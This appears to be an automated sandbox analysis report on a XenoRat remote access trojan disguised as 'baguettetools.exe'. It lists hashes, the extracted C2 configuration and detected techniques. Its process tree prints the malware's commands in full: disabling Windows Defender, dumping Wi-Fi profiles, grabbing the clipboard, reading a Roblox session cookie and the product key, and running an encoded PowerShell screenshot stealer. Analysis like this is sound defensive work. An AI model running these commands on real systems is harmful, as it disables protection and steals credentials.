Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2024 03:34

General

  • Target

    baguettetools.exe

  • Size

    7.5MB

  • MD5

    6c93db007ac855a52224591dbb98b4e1

  • SHA1

    b720c1f4253a4188f0fd221b645bc43463500116

  • SHA256

    63efbee5d3321fddd113d6ff67aae7dbad497a14c928fb40a0c87d8dbebb9f00

  • SHA512

    46a4cdc813b08ba0609622de44b075e5c3e9681308e883b357eaa23d8e8343ab906191b28df380c3ba8321cf45dac459867bd4ad9e9e6afba3d62057deac4415

  • SSDEEP

    196608:AsgVVEfwfI9jUC2gYBYv3vbW2+iITx1U6nn:CVVE0IH2gYBgDWJTnzn

Malware Config

Extracted

Family

xenorat

C2

192.168.1.36

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    4444

  • startup_name

    nothingset

Signatures

  • Detect XenoRat Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\baguettetools.exe
    "C:\Users\Admin\AppData\Local\Temp\baguettetools.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:232
    • C:\Users\Admin\AppData\Local\Temp\baguettetools.exe
      "C:\Users\Admin\AppData\Local\Temp\baguettetools.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\baguettetools.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\baguettetools.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4644
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3172
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2124
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3180
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4140
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1864
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1820
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4892
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4436
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:2856
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5040
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4136
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4460
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4188
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r1k5rmj4\r1k5rmj4.cmdline"
              5⤵
                PID:4868
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp" "c:\Users\Admin\AppData\Local\Temp\r1k5rmj4\CSC87F28E2EFF1D4014B543DF35DBBEB857.TMP"
                  6⤵
                    PID:2472
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1992
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4448
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4652
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4004
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:824
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3444
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3172
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2920
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4700
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:5032
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:4340
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4640
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:3932
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2580
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:1184
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:2212
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI2322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Spd5T.zip" *"
                                      3⤵
                                        PID:3212
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI2322\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI2322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Spd5T.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4436
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:2316
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4812
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:1224
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:4584
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:4016
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:4724
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:3176
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2380
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:3152
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:4460
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:2772
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2672

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                    SHA1

                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                    SHA256

                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                    SHA512

                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    64B

                                                    MD5

                                                    367b1c81198bfdcdba813c2c336627a3

                                                    SHA1

                                                    37fe6414eafaaed4abb91c1aafde62c5b688b711

                                                    SHA256

                                                    1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

                                                    SHA512

                                                    e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

